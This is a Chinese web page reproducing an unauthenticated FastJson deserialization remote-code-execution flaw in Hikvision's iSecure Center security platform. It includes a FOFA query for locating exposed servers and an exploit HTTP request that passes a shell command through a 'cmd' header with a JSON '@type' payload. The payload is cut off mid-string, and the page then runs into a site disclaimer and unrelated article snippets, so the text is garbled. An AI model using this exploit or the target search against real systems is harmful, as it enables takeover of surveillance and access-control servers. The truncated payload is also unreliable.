海康威视综合安防管理平台 多处 FastJson反序列化RCE漏洞复现

0x01 产品简介

海康威视综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备。海康威视集成化综合管理软件平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。

0x02 漏洞概述

由于海康威视综合安防管理平台使用了低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行,从而获取服务器权限。

0x03 复现环境

FOFA:app="HIKVISION-iSecure-Center"

0x04 漏洞复现

Exp-1

POST /bic/ssoService/v1/keepAlive HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/json
cmd: dir{"CTGT":{ "a": {"@type": "java.lang

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/24070.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

每日一练 2024.6.7

给你一个仅由 大写 英文字符组成的字符串 s 。 你可以对此字符串执行一些操作,在每一步操作中,你可以从 s 中删除 任一个 "AB" 或 "CD" 子字符串。 通过执行操作,删除所有 "AB" 和 "CD" 子串&#x…

如何备份和恢复华为手机?

智能手机已成为我们日常生活中不可或缺的一部分,它们存储着大量敏感数据。因此,确保数据安全,定期备份至关重要,以防手机意外丢失、损坏或被盗。 如果您拥有华为设备,并且正在寻找如何将华为手机备份到PC的方法&#…

爱校对繁体字校对上线——让企业文档更精准

在港澳台地区,企业每天都要处理大量繁体字文档,确保文档的准确性和专业性至关重要。爱校对全新推出的繁体字校对服务,专为企业设计,自动检测并修正拼写和语法错误,让您的文档管理更加轻松高效,提升企业形象…

ubuntu20.04 升级(卸载安装)NVIDIA 驱动程序

ubuntu20.04 升级(卸载安装)NVIDIA 驱动程序 首先确认自己所需的型号,然后去官网上下载对应的驱动:https://www.nvidia.cn/Download/index.aspx?langcn 所需安装依赖包: sudo apt install -y build-essential g gcc make dkms卸载旧版本的…

【权威主办|投稿优惠】2024年应用物理、力学与数学国际会议(APMM 2024)

2024年应用物理、力学与数学国际会议(APMM 2024) 2024 International Conference on Applied Physics, Mechanics, and Mathematics 【重要信息】 大会地点:南昌 大会官网:http://www.iacapmm.com 投稿邮箱:iacapmmsu…

香港优才diy推荐信很难写?看看140分获批的人怎么写!(附上模板)

大家好,我是已获批香港优才的糖爸。 香港优才diy推荐信作为申请材料中的重要一环,对于申请人过往工作的综合软实力和入境处的审核具有重要影响。如何撰写一份优秀的雇主推荐信呢?就我的获批经验来谈谈。 一、明确推荐信的目的 雇主推荐信的主…

外贸干货|如何提高商机转化率?

常常听到外贸业务员抱怨“询盘质量不高”、“有询盘没转化”、“有些客户只是来比价格的”……想必大家都不陌生! 但难道只有询盘问题、客户问题吗?我们自身的处理真的没问题吗?我想只有更多的自省自查我们可以控制的问题,优化我们…

【位运算】个人练习-Leetcode-2897. Apply Operations on Array to Maximize Sum of Squares

题目链接:https://leetcode.cn/problems/apply-operations-on-array-to-maximize-sum-of-squares/description/ 题目大意:给定一个数组nums[],给出一种操作,该操作选定两个不同的数组元素x, y,然后将其中一个变为x AN…

大模型在信用卡行业的应用探索

2022年11月,OpenAI发布ChatGPT3.5,迅速引起各界广泛关注,引发了人工智能领域新一轮发展热潮。ChatGPT作为一款基于人工智能技术的大语言模型(LLMs),在文本生成、对话理解、多领域知识覆盖等方面具有卓越表现…

替代LT3741大功率20A恒压恒流驱动器

1. 产品特性(替代LT3741) ➢ CTRL 引脚对输出电流提供精确控制 ➢ 2%的电压调节精度 ➢ 6%的电流调节精度 ➢ 输入电压范围(外接达林顿 NPN 管): 6V~40V ➢ 输入电压范围(外接单颗 NPN 管): 5.25V~40V…

markdown图片离线备份,批量替换url

之前在某站写了很多笔记&#xff0c;最近想着迁移备份下&#xff0c;找到了接口写了个脚本将文章爬取下来了。文章是基于 Markdown 格式的&#xff0c;在写作时粘贴图片&#xff0c;直接上传到他们图床服务器了。Markdown 文本里面是个<img src"https://aaa.com/bbb.jp…

神经网络 torch.nn---Containers

torch.nn — PyTorch 2.3 documentation torch.nn - PyTorch中文文档 (pytorch-cn.readthedocs.io) nn是Neural Network的简称&#xff0c;帮助程序员方便执行如下的与神经网络相关的行为&#xff1a; &#xff08;1&#xff09;创建神经网络 &#xff08;2&#xff09;训练…

基于SpringBoot的装饰工程管理系统源码数据库

如今社会上各行各业&#xff0c;都喜欢用自己行业的专属软件工作&#xff0c;互联网发展到这个时候&#xff0c;人们已经发现离不开了互联网。新技术的产生&#xff0c;往往能解决一些老技术的弊端问题。因为传统装饰工程项目信息管理难度大&#xff0c;容错率低&#xff0c;管…

C++应用维纳滤波实现语音信号的去噪

维纳滤波是一种滤波器&#xff0c;它根据全部过去的和当前的观察数据来估计信号的当前值&#xff0c;它的解是以均方误差最小条件下所得到的系统的传递函数H(z)或单位样本响应h(n)的形式给出的&#xff0c;因此维纳滤波器也称为最佳线性滤波器。 可以使用MATLAB语言实现应用维纳…

RERCS系统开发实战案例-Part01 快速启动面板创建新功能启动面板

需求背景&#xff1a;RERCS系统设计合同应收付比例调整界面&#xff0c;目的为合同与应收付款调整关联&#xff0c;保证数据的完整性与准确性。 步骤① 参数化快速启动板事务码 &#xff1a;LPD_CUST_PARAM 选择对应的角色与实例 可以看到系统中的快速启动面板菜单中已有的功能…

Spring Boot 中的异步 @Async

效率工具 推荐一个程序员常用的工具网站&#xff1a;程序员常用工具&#xff08;http://cxytools.com&#xff09;&#xff0c;有时间戳、JSON格式化、文本对比、HASH生成、UUID生成等常用工具&#xff0c;效率加倍嘎嘎好用。 小报童专栏精选Top100 推荐一个小报童专栏导航站&a…

SD卡格式化怎么恢复?一键扫描,轻松找回丢失的数据

SD卡格式化怎么恢复数据&#xff1f;在日常生活中&#xff0c;我们常常会使用SD卡来存储各种数据&#xff0c;如照片、视频、文档等。然而&#xff0c;当SD卡意外格式化或者出现其他问题时&#xff0c;里面的数据就会面临丢失的风险。 此时&#xff0c;如何恢复格式化的SD卡就…

gitleb详细的搭建步骤

在本地机房部署GitLab时&#xff0c;详细的搭建步骤如下&#xff1a; 1. 准备环境 1.1 硬件准备 服务器&#xff1a;高性能服务器&#xff0c;建议配置至少4核CPU、8GB内存、100GB存储。网络设备&#xff1a;确保服务器与网络的连接稳定。 1.2 操作系统 推荐使用Ubuntu Se…

女生学计算机当程序员真的好酷!

总有人觉得IT是男生的天下&#xff0c;“女孩子不适合学计算机”“计算机对女孩子没用”的刻板思想。那是你不知道&#xff0c;会写代码的女孩子有多酷多厉害&#x1f60e; 给大家盘点几个我觉得特别棒特别适合女孩子学习的计算机方向&#x1f447;&#x1f447;&#x1f447; …

本地启动ollama大语言模型

官网 Ollama 安装 rootmaster-node:~# snap install ollama 启动 rootmaster-node:~# ollama run gemma:2b 输出 verifying sha256 digest writing manifest removing any unused layers success >>> who are you? I am a large language model, trained by…